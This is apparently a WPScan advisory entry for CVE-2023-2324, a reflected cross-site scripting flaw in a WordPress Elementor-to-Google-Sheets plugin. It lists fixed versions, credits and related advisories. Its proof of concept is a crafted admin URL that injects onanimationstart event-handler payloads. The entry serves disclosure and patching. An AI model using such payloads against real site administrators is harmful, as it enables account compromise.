Elementor Forms Google Sheet Connector < 1.0.7 – Reflected XSS | CVE 2023-2324 | Plugin Vulnerabilities

Description

The plugin does not escape some parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open the URL below

https://example.com/wp-admin/admin.php?page=gsheetconnector-elementor-config&fetchsheetDataEle="style=animation-name:rotation onanimationstart=alert(/XSS-fetchsheetDataEle/)//&code="style=animation-name:rotation onanimationstart=alert(/XSS-code/)//

Affects Plugins

gsheetconnector-for-elementor-forms

Fixed in 1.0.7

gsheetconnector-for-elementor-forms-pro

Fixed in 1.0.5

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

50d81eec-f324-4445-b10f-96e94153917e

Timeline

Publicly Published

2023-06-12 (about 2 years ago)

Added

2023-06-12 (about 2 years ago)

Last Updated

2023-07-20 (about 2 years ago)

Other

Published

Title

Published

2014-08-01

Title

Page Showcaser Boxes - Title Field Stored XSS

Published

2024-08-07

Title

ParcelPanel < 4.3.3 - Reflected Cross-Site Scripting

Published

2025-04-24

Title

Blog Manager WP <= 1.0.5 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2024-06-06

Title

One Page Express Companion < 1.6.38 - Authenticated (Contributor+) Stored Cross-Site Scripting via one_page_express_contact_form Shortcode

Published

2025-05-07

Title

CC BMI Calculator < 2.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting